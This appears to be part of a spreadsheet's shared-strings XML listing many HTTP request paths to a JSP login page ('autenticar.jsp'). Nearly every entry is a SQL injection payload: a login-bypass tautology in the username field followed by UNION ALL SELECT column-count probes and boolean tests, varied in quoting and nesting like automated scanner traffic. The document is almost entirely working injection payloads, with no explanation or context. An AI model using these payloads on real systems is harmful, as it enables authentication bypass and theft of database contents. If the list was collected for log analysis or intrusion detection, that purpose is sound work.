    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347,8347--and(("jvmx"like"jvmx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351--and(("valc"like"valc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636,8636--and(("ccwf"like"ccwf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756--and((("okrv"like"okrv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432,5432--and((("ppfh"like"ppfh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672--and((("ylfx"like"ylfx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435,5435--and((("vulz"like"vulz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133,9133--and((("vhyi"like"vhyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939--and((("sieg"like"sieg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804--and((("htsn"like"htsn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598--and((("qzwm"like"qzwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577,2577--and((("cjoy"like"cjoy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705,1705--and((("vxko"like"vxko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect745,745,745,745,745,745,745,745,745,745,745,745,745,745,745,745,745,745,745,745,745--and"kywf"like"kywf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619,3619--and"dkqe"like"dkqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222,222--and"hdck"like"hdck</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744,2744--and"kvto"like"kvto</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855--and"bvqs"like"bvqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890,9890--and"kggu"like"kggu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403,9403--and"twoe"like"twoe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966,2966--and"ppsh"like"ppsh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375,8375--and"qpae"like"qpae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052--and"vsnv"like"vsnv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--and(4974=4974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--and(3057=3057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--and(9271=9271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--and(6066=6066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--and(2175=2175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--and(2301=2301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--and(5177=5177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--and(9439=9439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--and(924=924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--and(801=801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--and((8480=8480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--and((861=861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--and((9499=949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--and((7110=7110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--and((8931=8931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--and((1407=1407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--and((2254=2254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--and((2779=277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--and((3451=3451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--and((9018=9018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--and(((8106=8106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--and(((6252=6252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--and(((5306=5306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--and(((2494=2494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--and(((8331=8331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--and(((5205=5205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--and(((2148=2148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--and(((7161=7161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--and(((6171=6171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--and(((1418=1418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--and('sulh'='sulh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--and('fjbw'='fjbw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--and('ercy'='ercy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--and('tlsa'='tlsa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--and('erdl'='erdl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--and('sfaz'='sfaz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--and('gnnz'='gnnz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--and('uhby'='uhby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--and('wwxn'='wwxn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--and('pqbo'='pqbo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--and(('qmex'='qmex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--and(('eesj'='eesj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--and(('kqre'='kqre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--and(('jzaq'='jzaq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--and(('cgkc'='cgkc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--and(('jhvs'='jhvs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--and(('pfto'='pfto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--and(('vjuk'='vjuk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--and(('edsv'='edsv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--and(('qgzf'='qgzf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--and((('ozfm'='ozfm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--and((('udml'='udml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--and((('ftjm'='ftjm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--and((('ueot'='ueot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--and((('vwqx'='vwqx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--and((('rbno'='rbno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--and((('ijle'='ijle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--and((('beuu'='beuu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--and((('pmpx'='pmpx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--and((('tjco'='tjco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--and'dgrf'='dgrf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--and'rsgf'='rsgf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--and'ddyl'='ddyl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--and'tlig'='tlig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--and'wdex'='wdex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--and'vawm'='vawm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--and'zkut'='zkut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--and'nonh'='nonh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--and'dglh'='dglh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--and'onhj'='onhj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--and('cyve'like'cyve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--and('wbrx'like'wbrx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--and('wdbi'like'wdbi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--and('hmux'like'hmux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--and('fmxg'like'fmxg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--and('ohht'like'ohht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--and('ingm'like'ingm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--and('ajoc'like'ajoc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--and('htkk'like'htkk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--and('cpcd'like'cpcd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--and(('japv'like'japv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--and(('grie'like'grie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--and(('tdwq'like'tdwq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--and(('zckx'like'zckx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--and(('tyqs'like'tyqs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--and(('utvy'like'utvy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--and(('mkvv'like'mkvv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--and(('sbqh'like'sbqh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--and(('ypge'like'ypge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--and(('ewnv'like'ewnv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--and((('calm'like'calm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--and((('thck'like'thck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--and((('exbz'like'exbz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--and((('dvzv'like'dvzv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--and((('gxsy'like'gxsy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--and((('yylf'like'yylf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--and((('ovyt'like'ovyt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--and((('kcid'like'kcid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--and((('tkcg'like'tkcg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--and((('cvqr'like'cvqr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--and'eyqf'like'eyqf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--and'bxsc'like'bxsc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--and'jtti'like'jtti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--and'jgrf'like'jgrf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--and'hdfs'like'hdfs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--and'buqd'like'buqd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--and'nltw'like'nltw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--and'uxxz'like'uxxz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--and'ecyn'like'ecyn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--and'wiwh'like'wiwh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--and("ypnt"="ypnt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--and("sehq"="sehq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--and("nxai"="nxai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--and("zrsd"="zrsd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--and("crii"="crii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--and("gard"="gard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--and("dhyt"="dhyt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--and("lhaa"="lhaa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--and("srka"="srka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--and("iwox"="iwox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--and(("yafu"="yafu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--and(("jhfh"="jhfh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--and(("cvnz"="cvnz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--and(("kcen"="kcen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--and(("ugxw"="ugxw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--and(("fuiq"="fuiq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--and(("wdua"="wdua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--and(("lgcq"="lgcq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--and(("ulxv"="ulxv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--and(("kjnd"="kjnd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--and((("lfea"="lfea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--and((("ojbg"="ojbg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--and((("wzsw"="wzsw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--and((("xqpd"="xqpd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--and((("szwa"="szwa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--and((("ohua"="ohua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--and((("qedr"="qedr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--and((("xgyd"="xgyd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--and((("rwmv"="rwmv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--and((("yasd"="yasd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--and"etma"="etma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--and"dzxq"="dzxq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--and"nkow"="nkow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--and"wjvw"="wjvw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--and"nptw"="nptw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--and"slkz"="slkz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--and"wbrl"="wbrl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--and"zipz"="zipz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--and"hzue"="hzue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--and"wyda"="wyda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--and("gqfy"like"gqfy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--and("jjgh"like"jjgh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--and("mhyy"like"mhyy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--and("kkzm"like"kkzm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--and("hgbf"like"hgbf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--and("gdai"like"gdai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--and("kdhf"like"kdhf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--and("aqsr"like"aqsr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--and("pgft"like"pgft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--and("xlbz"like"xlbz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--and(("zoag"like"zoag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--and(("tnys"like"tnys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--and(("wuqy"like"wuqy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--and(("rohn"like"rohn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--and(("quhf"like"quhf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--and(("zdjs"like"zdjs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--and(("uncv"like"uncv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--and(("sjtw"like"sjtw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--and(("ilyd"like"ilyd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--and(("gebz"like"gebz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--and((("sgqp"like"sgqp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--and((("amcx"like"amcx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--and((("jkzz"like"jkzz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--and((("pvlu"like"pvlu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--and((("zxwq"like"zxwq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--and((("sswt"like"sswt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--and((("sbgz"like"sbgz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--and((("kvjq"like"kvjq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--and((("wfce"like"wfce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--and((("crvt"like"crvt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--and"mhme"like"mhme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--and"pklo"like"pklo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--and"erst"like"erst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--and"ncdr"like"ncdr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--and"rbyg"like"rbyg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--and"wmaq"like"wmaq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--and"qmub"like"qmub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--and"dpal"like"dpal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--and"zpgm"like"zpgm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--and"phdu"like"phdu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643,8643--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919,2919--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154,1154--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103,3103--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919,8919--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636,2636--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333,2333--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820,4820--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161,6161--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664,7664--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148,3148--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200,1200--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883,883--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328,3328--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094,1094--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466,4466--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280,8280--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456,1456--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990,5990--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857,8857--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325,7325--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310,7310--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941,2941--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558,3558--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707,8707--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587,4587--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271,5271--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535,4535--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084,6084--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429,9429--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767,7767--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589,9589--and(6797=6797</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758,2758--and(8556=8556</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176,8176--and(6118=6118</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178,8178--and(6877=6877</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971--and(6643=6643</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609,1609--and(7371=7371</t>
  </si>
  <si>
